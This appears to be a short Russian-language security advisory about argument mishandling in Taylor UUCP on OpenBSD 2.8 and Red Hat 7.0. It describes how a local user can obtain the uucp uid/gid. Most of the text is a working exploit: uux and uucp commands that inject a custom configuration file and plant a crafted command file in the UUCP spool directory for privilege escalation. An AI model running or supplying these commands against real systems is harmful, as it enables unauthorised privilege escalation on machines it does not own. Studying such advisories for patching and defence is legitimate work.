Неправильная обработка пакета Taylor UUCP 

Из-за неправильной обработки параметра в Taylor
UUCP можно получить uid/gid. Что в
дальнейшем может привести к получению многих привилегий.

Уязвимая система: 
OpenBSD 2.8
Redhat 7.0

Эксплоит:

$ uux ‘uucp -I/tmp/vv.v /tmp/somefile /tmp/someotherfile’
или
$ uux ‘uucp —config=/tmp/vv.v /tmp/somefile /tmp/someotherfile’
$ THISHOST=`uuname -l`
$ WHEREYOUWANTIT=/var/spool/uucp/${THISHOST}/ X./X.${THISHOST}X1337
$ uux ‘uucp —config=/tmp/config.uucp /tmp/commands.uucp ‘${WHEREYOUWANTIT}

Оставить мнение